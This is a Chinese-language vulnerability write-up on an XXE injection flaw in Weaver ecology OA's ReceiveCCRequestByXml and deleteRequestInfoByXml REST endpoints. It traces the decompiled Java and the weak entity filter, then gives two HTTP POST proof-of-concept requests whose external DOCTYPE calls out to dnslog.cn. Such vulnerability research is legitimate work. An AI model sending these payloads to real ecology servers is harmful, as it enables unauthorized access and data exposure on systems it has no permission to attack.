泛微ecology ReceiveCCRequestByXml-XXE注入

ReceiveCCRequestByXml.class

WEAVER\ecology\classbean\weaver\rest\servlet\service\ofs\ReceiveCCRequestByXml.class

public void service(IRestRequest var1, IRestResponse var2) throws RestException {
    	//var3获取http请求的内容
        HttpServletRequest var3 = var1.getHttpRequest();
        Response var4 = new Response();
    	//getServletInputStreamContent将var3转化为string类型赋值给var5
        String var5 = ServletUtil.getServletInputStreamContent(var3, "UTF-8");
        if (!"".equals(var5)) {
            OfsTodoDataManagerNew var6 = new OfsTodoDataManagerNew();
            String var7 = ServletUtil.getIpAddress(var3);
            var6.setClientIp(var7);
            //receiveCCRequestByXml方法处理var5
            String var8 = var6.receiveCCRequestByXml(var5);
            var4.addMessage("result", var8);
        }

        var2.writeReponse(var4);
    }

直接看service函数就行，var3获取的是http的请求内容，然后通过getServletInputStreamContent方法将var3的内容转换为String类型赋值给var5，如果var5不为空，再通过OfsTodoDataManagerNew的receiveCCRequestByXml函数去处理var5

getServletInputStreamContent

getServletInputStreamContent函数简单说就是将刚才的var3转换string并在有换行的地方添加换行符然后返回给var5

receiveCCRequestByXml

第一步中调用xmlToMap函数处理传入的var5

xmlToMap

var1 = SecurityMethodUtil.clearEntity(var1);//做了安全检查进行过滤

SecurityMethodUtil.clearEntity

    public static String clearEntity(String xml) {
        if (xml != null && !"".equals(xml)) {
            return xml.toLowerCase().indexOf("entity") == -1 ? xml : xml.replaceAll("(?i)\\<\\!entity", "*");
        } else {
            return xml;
        }
    }

传入的字符串如果不为空，检查是否存在entity，如果字符串中不包含"entity"，则直接返回；如果字符串中包含"entity"，则使用replaceAll()方法将所有<!ENTITY替换为*。

检查完之后xmlToMap执行DocumentHelper.parseText

Document var3 = DocumentHelper.parseText(var1);

其实在这里就是org.dom4j.DocumentHelper.parseText去解析xml了

还有一个deleteRequestInfoByXml代码上是差不多的也是可以XXE的就不接着写了

POC1

ReceiveCCRequestByXml

POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: ip
Content-Type: application/xml
Content-Length: 133

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://dnslog.cn">
<M><syscode>&send;</syscode></M>

POC2

deleteRequestInfoByXml

POST /rest/ofs/deleteRequestInfoByXml HTTP/1.1
Host: ip
Content-Type: application/xml
Content-Length: 131

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://dnslog.cn/aa">
<M><syscode>&send;</syscode></M>

本栏目推荐文章
• Fight Hard for Ecological Protection and Governance of the Yellow River to Address the Water Contamination
• XXE漏洞与有回显的XXE
• Java XXE漏洞原理研究
• Secure Code Warrior C# Basic OWASP Web Top 10 2017 1: Injection Flaws and 2: Broken Authentication vulnerabilities 3: Sensitive Data Exposure and 4: XXE vulnerabilities
• XXE篇
• 从原理到实战，详解XXE攻击
• XXE漏洞
• WEB漏洞-XXE&XML之利用检测绕过全解
• XXE漏洞
• XXE载荷

ReceiveCCRequestByXml-XXE ReceiveCCRequestByXml ecology XXEreceiveccrequestbyxml-xxe receiveccrequestbyxml-xxe receiveccrequestbyxml ecological contamination ecological governance protection filedownloadforoutdoc前台ecology sql xxe 漏洞xxe ecology 实体xxe vulnhub-xxe